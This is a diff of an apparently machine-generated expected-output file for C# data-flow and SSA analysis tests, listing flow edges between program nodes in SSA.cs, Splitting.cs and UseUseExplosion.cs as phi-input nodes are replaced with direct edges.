phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:119:17:119:41 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | | SSA.cs:119:21:119:24 | [post] this access | SSA.cs:123:23:123:26 | this access | | SSA.cs:119:21:119:24 | this access | SSA.cs:123:23:123:26 | this access | -| SSA.cs:119:21:119:26 | [post] access to field S | SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | -| SSA.cs:119:21:119:26 | access to field S | SSA.cs:119:17:119:41 | [input] SSA phi read(this.S) | -| SSA.cs:119:21:119:40 | [post] access to field SsaFieldSink1 | SSA.cs:119:17:119:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:119:21:119:40 | access to field SsaFieldSink1 | SSA.cs:119:17:119:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | -| SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | SSA.cs:123:9:123:30 | SSA phi read(this.S) | -| SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | +| SSA.cs:119:21:119:26 | [post] access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:119:21:119:26 | access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:119:21:119:40 | [post] access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:119:21:119:40 | access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:17:121:41 | [input] SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | | SSA.cs:121:21:121:24 | [post] this access | SSA.cs:123:23:123:26 | this access | | SSA.cs:121:21:121:24 | this access | SSA.cs:123:23:123:26 | this access | -| SSA.cs:121:21:121:26 | [post] access to field S | SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | -| SSA.cs:121:21:121:26 | access to field S | SSA.cs:121:17:121:41 | [input] SSA phi read(this.S) | -| SSA.cs:121:21:121:40 | [post] access to field SsaFieldSink1 | SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:121:21:121:40 | access to field SsaFieldSink1 | SSA.cs:121:17:121:41 | [input] SSA phi(this.S.SsaFieldSink1) | -| SSA.cs:123:9:123:30 | SSA phi read(nonTainted) | SSA.cs:128:13:128:22 | access to parameter nonTainted | -| SSA.cs:123:9:123:30 | SSA phi read(this.S) | SSA.cs:123:23:123:28 | access to field S | -| SSA.cs:123:9:123:30 | SSA phi(this.S.SsaFieldSink1) | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:21:121:26 | [post] access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:121:21:121:26 | access to field S | SSA.cs:123:23:123:28 | access to field S | +| SSA.cs:121:21:121:40 | [post] access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | +| SSA.cs:121:21:121:40 | access to field SsaFieldSink1 | SSA.cs:123:23:123:28 | SSA qualifier def(this.S.SsaFieldSink1) | | SSA.cs:123:23:123:26 | [post] this access | SSA.cs:124:15:124:18 | this access | | SSA.cs:123:23:123:26 | this access | SSA.cs:124:15:124:18 | this access | | SSA.cs:123:23:123:28 | SSA def(this.S) | SSA.cs:124:15:124:20 | access to field S | @@ -1014,13 +970,12 @@ | SSA.cs:127:9:127:14 | access to field S | SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | | SSA.cs:127:9:127:14 | access to field S | SSA.cs:130:13:130:18 | access to field S | | SSA.cs:127:9:127:31 | access to field SsaFieldNonSink0 | SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | -| SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:128:13:128:33 | [input] SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:127:9:127:36 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:127:35:127:36 | "" | SSA.cs:127:9:127:31 | access to field SsaFieldNonSink0 | | SSA.cs:128:13:128:22 | [post] access to parameter nonTainted | SSA.cs:131:17:131:26 | access to parameter nonTainted | | SSA.cs:128:13:128:22 | access to parameter nonTainted | SSA.cs:131:17:131:26 | access to parameter nonTainted | | SSA.cs:128:13:128:29 | access to property Length | SSA.cs:128:13:128:33 | ... > ... | -| SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:128:13:128:33 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:128:13:128:33 | [input] SSA phi read(this.S) | SSA.cs:136:23:136:28 | access to field S | | SSA.cs:130:13:130:16 | [post] this access | SSA.cs:132:21:132:24 | this access | | SSA.cs:130:13:130:16 | [post] this access | SSA.cs:134:21:134:24 | this access | | SSA.cs:130:13:130:16 | this access | SSA.cs:132:21:132:24 | this access | @@ -1034,24 +989,18 @@ | SSA.cs:130:13:130:46 | SSA def(this.S.SsaFieldNonSink0) | SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | | SSA.cs:130:39:130:46 | access to local variable nonSink0 | SSA.cs:130:13:130:35 | access to field SsaFieldNonSink0 | | SSA.cs:131:17:131:33 | access to property Length | SSA.cs:131:17:131:37 | ... > ... | -| SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | | SSA.cs:132:21:132:24 | [post] this access | SSA.cs:136:23:136:26 | this access | | SSA.cs:132:21:132:24 | this access | SSA.cs:136:23:136:26 | this access | -| SSA.cs:132:21:132:26 | [post] access to field S | SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | -| SSA.cs:132:21:132:26 | access to field S | SSA.cs:132:17:132:44 | [input] SSA phi read(this.S) | -| SSA.cs:132:21:132:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:132:21:132:43 | access to field SsaFieldNonSink0 | SSA.cs:132:17:132:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | SSA.cs:136:9:136:30 | SSA phi read(this.S) | -| SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | +| SSA.cs:132:21:132:26 | [post] access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:132:21:132:26 | access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:132:21:132:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:132:21:132:43 | access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:134:21:134:24 | [post] this access | SSA.cs:136:23:136:26 | this access | | SSA.cs:134:21:134:24 | this access | SSA.cs:136:23:136:26 | this access | -| SSA.cs:134:21:134:26 | [post] access to field S | SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | -| SSA.cs:134:21:134:26 | access to field S | SSA.cs:134:17:134:44 | [input] SSA phi read(this.S) | -| SSA.cs:134:21:134:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | SSA.cs:134:17:134:44 | [input] SSA phi(this.S.SsaFieldNonSink0) | -| SSA.cs:136:9:136:30 | SSA phi read(this.S) | SSA.cs:136:23:136:28 | access to field S | -| SSA.cs:136:9:136:30 | SSA phi(this.S.SsaFieldNonSink0) | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:134:21:134:26 | [post] access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:134:21:134:26 | access to field S | SSA.cs:136:23:136:28 | access to field S | +| SSA.cs:134:21:134:43 | [post] access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | +| SSA.cs:134:21:134:43 | access to field SsaFieldNonSink0 | SSA.cs:136:23:136:28 | SSA qualifier def(this.S.SsaFieldNonSink0) | | SSA.cs:136:23:136:26 | [post] this access | SSA.cs:137:15:137:18 | this access | | SSA.cs:136:23:136:26 | this access | SSA.cs:137:15:137:18 | this access | | SSA.cs:136:23:136:28 | SSA def(this.S) | SSA.cs:137:15:137:20 | access to field S | @@ -1065,12 +1014,10 @@ | SSA.cs:146:13:146:13 | access to parameter t | SSA.cs:146:13:146:13 | (...) ... | | SSA.cs:146:13:146:13 | access to parameter t | SSA.cs:149:17:149:17 | access to parameter t | | SSA.cs:147:13:147:13 | access to parameter t | SSA.cs:147:13:147:26 | SSA def(t) | -| SSA.cs:147:13:147:26 | SSA def(t) | SSA.cs:147:13:147:26 | [input] SSA phi(t) | -| SSA.cs:147:13:147:26 | [input] SSA phi(t) | SSA.cs:144:17:144:26 | SSA phi(t) | +| SSA.cs:147:13:147:26 | SSA def(t) | SSA.cs:144:17:144:26 | SSA phi(t) | | SSA.cs:147:17:147:26 | default(...) | SSA.cs:147:13:147:13 | access to parameter t | | SSA.cs:149:13:149:13 | access to parameter t | SSA.cs:149:13:149:17 | SSA def(t) | -| SSA.cs:149:13:149:17 | SSA def(t) | SSA.cs:149:13:149:17 | [input] SSA phi(t) | -| SSA.cs:149:13:149:17 | [input] SSA phi(t) | SSA.cs:144:17:144:26 | SSA phi(t) | +| SSA.cs:149:13:149:17 | SSA def(t) | SSA.cs:144:17:144:26 | SSA phi(t) | | SSA.cs:149:17:149:17 | access to parameter t | SSA.cs:149:13:149:13 | access to parameter t | | SSA.cs:152:36:152:36 | SSA param(t) | SSA.cs:154:13:154:13 | access to parameter t | | SSA.cs:152:36:152:36 | t | SSA.cs:152:36:152:36 | SSA param(t) | @@ -1079,8 +1026,7 @@ | SSA.cs:154:13:154:13 | access to parameter t | SSA.cs:154:13:154:21 | [input] SSA phi(t) | | SSA.cs:154:13:154:13 | access to parameter t | SSA.cs:155:25:155:25 | access to parameter t | | SSA.cs:154:13:154:21 | [input] SSA phi(t) | SSA.cs:152:17:152:28 | SSA phi(t) | -| SSA.cs:155:13:155:26 | [input] SSA phi(t) | SSA.cs:152:17:152:28 | SSA phi(t) | -| SSA.cs:155:25:155:25 | SSA def(t) | SSA.cs:155:13:155:26 | [input] SSA phi(t) | +| SSA.cs:155:25:155:25 | SSA def(t) | SSA.cs:152:17:152:28 | SSA phi(t) | | SSA.cs:155:25:155:25 | access to parameter t | SSA.cs:155:25:155:25 | SSA def(t) | | SSA.cs:166:10:166:13 | this | SSA.cs:166:19:166:22 | this access | | SSA.cs:166:28:166:31 | null | SSA.cs:166:19:166:24 | access to field S | @@ -1089,31 +1035,24 @@ | SSA.cs:168:35:168:35 | SSA param(i) | SSA.cs:171:13:171:13 | access to parameter i | | SSA.cs:168:35:168:35 | i | SSA.cs:168:35:168:35 | SSA param(i) | | SSA.cs:170:16:170:23 | access to local variable ssaSink5 | SSA.cs:170:16:170:28 | SSA def(ssaSink5) | -| SSA.cs:170:16:170:28 | SSA def(ssaSink5) | SSA.cs:171:13:171:19 | [input] SSA phi(ssaSink5) | +| SSA.cs:170:16:170:28 | SSA def(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | | SSA.cs:170:27:170:28 | "" | SSA.cs:170:16:170:23 | access to local variable ssaSink5 | | SSA.cs:171:13:171:13 | access to parameter i | SSA.cs:171:13:171:15 | SSA def(i) | | SSA.cs:171:13:171:15 | ...-- | SSA.cs:171:13:171:19 | ... > ... | -| SSA.cs:171:13:171:15 | SSA def(i) | SSA.cs:174:13:178:13 | [input] SSA phi(i) | -| SSA.cs:171:13:171:19 | [input] SSA phi(ssaSink5) | SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | +| SSA.cs:171:13:171:15 | SSA def(i) | SSA.cs:174:20:174:20 | access to parameter i | | SSA.cs:173:13:173:20 | access to local variable ssaSink5 | SSA.cs:173:13:173:30 | SSA def(ssaSink5) | -| SSA.cs:173:13:173:30 | SSA def(ssaSink5) | SSA.cs:174:13:178:13 | [input] SSA phi read(ssaSink5) | +| SSA.cs:173:13:173:30 | SSA def(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | | SSA.cs:173:24:173:30 | access to parameter tainted | SSA.cs:173:13:173:20 | access to local variable ssaSink5 | -| SSA.cs:174:13:178:13 | [input] SSA phi read(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | -| SSA.cs:174:13:178:13 | [input] SSA phi(i) | SSA.cs:174:20:174:20 | SSA phi(i) | | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | SSA.cs:176:21:176:28 | access to local variable ssaSink5 | -| SSA.cs:174:20:174:20 | SSA phi(i) | SSA.cs:174:20:174:20 | access to parameter i | | SSA.cs:174:20:174:20 | access to parameter i | SSA.cs:174:20:174:22 | SSA def(i) | | SSA.cs:174:20:174:22 | ...-- | SSA.cs:174:20:174:26 | ... > ... | -| SSA.cs:174:20:174:22 | SSA def(i) | SSA.cs:177:17:177:29 | [input] SSA phi(i) | -| SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | +| SSA.cs:174:20:174:22 | SSA def(i) | SSA.cs:174:20:174:20 | access to parameter i | +| SSA.cs:174:20:174:26 | [input] SSA phi(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | | SSA.cs:176:21:176:28 | [post] access to local variable ssaSink5 | SSA.cs:177:21:177:28 | access to local variable ssaSink5 | | SSA.cs:176:21:176:28 | access to local variable ssaSink5 | SSA.cs:177:21:177:28 | access to local variable ssaSink5 | -| SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | -| SSA.cs:177:17:177:29 | [input] SSA phi(i) | SSA.cs:174:20:174:20 | SSA phi(i) | -| SSA.cs:177:21:177:28 | [post] access to local variable ssaSink5 | SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | -| SSA.cs:177:21:177:28 | access to local variable ssaSink5 | SSA.cs:177:17:177:29 | [input] SSA phi read(ssaSink5) | -| SSA.cs:180:9:180:24 | SSA phi(ssaSink5) | SSA.cs:180:15:180:22 | access to local variable ssaSink5 | +| SSA.cs:177:21:177:28 | [post] access to local variable ssaSink5 | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | +| SSA.cs:177:21:177:28 | access to local variable ssaSink5 | SSA.cs:174:20:174:20 | SSA phi read(ssaSink5) | | Splitting.cs:3:18:3:18 | SSA param(b) | Splitting.cs:6:13:6:13 | access to parameter b | | Splitting.cs:3:18:3:18 | b | Splitting.cs:3:18:3:18 | SSA param(b) | | Splitting.cs:3:28:3:34 | SSA param(tainted) | Splitting.cs:5:17:5:23 | access to parameter tainted | @@ -2054,509 +1993,408 @@ | UseUseExplosion.cs:24:1689:24:1692 | access to property Prop | UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | | UseUseExplosion.cs:24:1689:24:1692 | this access | UseUseExplosion.cs:24:1708:24:1713 | this access | | UseUseExplosion.cs:24:1689:24:1692 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | +| UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1699:24:1701 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | -| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1708:24:1713 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1708:24:1713 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1712:24:1712 | access to local variable x | UseUseExplosion.cs:24:1708:24:1713 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1712:24:1712 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1723:24:1728 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1723:24:1728 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1727:24:1727 | access to local variable x | UseUseExplosion.cs:24:1723:24:1728 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1727:24:1727 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1738:24:1743 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1738:24:1743 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1742:24:1742 | access to local variable x | UseUseExplosion.cs:24:1738:24:1743 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1742:24:1742 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1753:24:1758 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1753:24:1758 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1757:24:1757 | access to local variable x | UseUseExplosion.cs:24:1753:24:1758 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1757:24:1757 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1768:24:1773 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1768:24:1773 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1772:24:1772 | access to local variable x | UseUseExplosion.cs:24:1768:24:1773 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1772:24:1772 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1783:24:1788 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1783:24:1788 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1787:24:1787 | access to local variable x | UseUseExplosion.cs:24:1783:24:1788 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1787:24:1787 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1798:24:1803 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1798:24:1803 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1802:24:1802 | access to local variable x | UseUseExplosion.cs:24:1798:24:1803 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1802:24:1802 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1813:24:1818 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1813:24:1818 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1817:24:1817 | access to local variable x | UseUseExplosion.cs:24:1813:24:1818 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1817:24:1817 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1828:24:1833 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1828:24:1833 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1832:24:1832 | access to local variable x | UseUseExplosion.cs:24:1828:24:1833 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1832:24:1832 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1843:24:1848 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1843:24:1848 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1847:24:1847 | access to local variable x | UseUseExplosion.cs:24:1843:24:1848 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1847:24:1847 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1858:24:1863 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1858:24:1863 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1862:24:1862 | access to local variable x | UseUseExplosion.cs:24:1858:24:1863 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1862:24:1862 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1873:24:1878 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1873:24:1878 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1877:24:1877 | access to local variable x | UseUseExplosion.cs:24:1873:24:1878 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1877:24:1877 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1888:24:1893 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1888:24:1893 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1892:24:1892 | access to local variable x | UseUseExplosion.cs:24:1888:24:1893 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1892:24:1892 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:1903:24:1908 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:1903:24:1908 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:1907:24:1907 | access to local variable x | UseUseExplosion.cs:24:1903:24:1908 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1907:24:1907 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:1918:24:1923 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 